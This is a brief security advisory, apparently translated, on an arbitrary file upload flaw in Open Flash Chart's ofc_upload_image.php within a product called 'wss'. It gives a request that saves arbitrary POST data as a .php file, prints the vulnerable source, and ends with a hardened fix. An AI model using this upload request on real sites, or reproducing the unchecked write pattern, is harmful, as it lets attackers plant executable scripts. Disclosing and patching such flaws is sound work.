Vulnerable file saves POST data to a file with an arbitrary extension
Vulnerable file: /chart/php-ofc-library/ofc_upload_image.php

Exploitation:
/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php (hfy.php is the file name)

POST arbitrary data
Saved to: http://localhost/chart/tmp-upload-images/hfy.php

The vulnerable file is from the latest version of wss; even the paid version has it, in the demo deployed in the Sina store~

<?php

//
// In Open Flash Chart -> save_image debug mode, you
// will see the 'echo' text in a new window.
//

/*

print_r( $_GET );
print_r( $_POST );
print_r( $_FILES );

print_r( $GLOBALS );
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );

*/

// default path for the image to be stored //
$default_path = '../tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
$destination = $default_path . basename( $_GET[ 'name' ] );

echo 'Saving your image to: '. $destination;
// print_r( $_POST );
// print_r( $_SERVER );
// echo $HTTP_RAW_POST_DATA;

//
// POST data is usually string data, but we are passing a RAW .png
// so PHP is a bit confused and $_POST is empty. But it has saved
// the raw bits into $HTTP_RAW_POST_DATA
//

$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);

//
// LOOK:
//
exit();
//
// PHP5:
//

// default path for the image to be stored //
$default_path = 'tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );

// move the image into the specified directory //
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
    echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
} else {
    echo "FILE UPLOAD FAILED";
}

?>

Fix:
This vulnerable file is simply a tragedy. How to deal with it: add permission checks, extension validation and so on~, do it yourself
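
The fix above names two controls, a permission check and extension validation. A hardened variant of the raw-POST branch of ofc_upload_image.php that applies both is sketched here as an added example; it is not part of the original post or the project's own code. The $_SESSION['user_id'] login marker, the PNG-only allowlist and the 2 MiB size cap are assumptions.

```php
<?php
// Added example: hardened variant of the raw-POST branch (not the project's code).
// Assumption: the host application sets $_SESSION['user_id'] at login (hypothetical key).
session_start();

const UPLOAD_DIR  = __DIR__ . '/../tmp-upload-images/';
const MAX_BYTES   = 2 * 1024 * 1024;   // assumed cap on the request body
const ALLOWED_EXT = ['png'];           // the original comments say a raw .png is posted

function fail(int $code, string $msg): void {
    http_response_code($code);
    exit($msg);
}

// 1. Permission check: only an authenticated session may write files.
if (empty($_SESSION['user_id'])) { fail(403, 'Forbidden'); }
if ($_SERVER['REQUEST_METHOD'] !== 'POST') { fail(405, 'POST only'); }

// 2. Extension check: the base name may not contain dots, so exactly one
//    extension exists; "x.php", "x.php.png" and "x.png.php" are all rejected.
$name = basename((string)($_GET['name'] ?? ''));
if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]+)\z/', $name, $m)
    || !in_array(strtolower($m[1]), ALLOWED_EXT, true)) {
    fail(400, 'Invalid file name');
}

// 3. Content check: php://input replaces $HTTP_RAW_POST_DATA. The body must
//    parse as a PNG header; this is a sanity check, the name allowlist above
//    is what keeps the stored file from being treated as a script.
$body = file_get_contents('php://input', false, null, 0, MAX_BYTES + 1);
if ($body === false || strlen($body) > MAX_BYTES) { fail(413, 'Body too large'); }
$info = @getimagesizefromstring($body);
if ($info === false || $info[2] !== IMAGETYPE_PNG) {
    fail(415, 'Not a PNG image');
}

// 4. Write without world-writable permissions (the original used 0777). The
//    web server should also be configured never to execute scripts from here.
if (!is_dir(UPLOAD_DIR) && !mkdir(UPLOAD_DIR, 0750, true)) { fail(500, 'Cannot create directory'); }
if (file_put_contents(UPLOAD_DIR . $name, $body, LOCK_EX) === false) { fail(500, 'Write failed'); }

echo 'Saved image as: ' . htmlspecialchars($name, ENT_QUOTES);
```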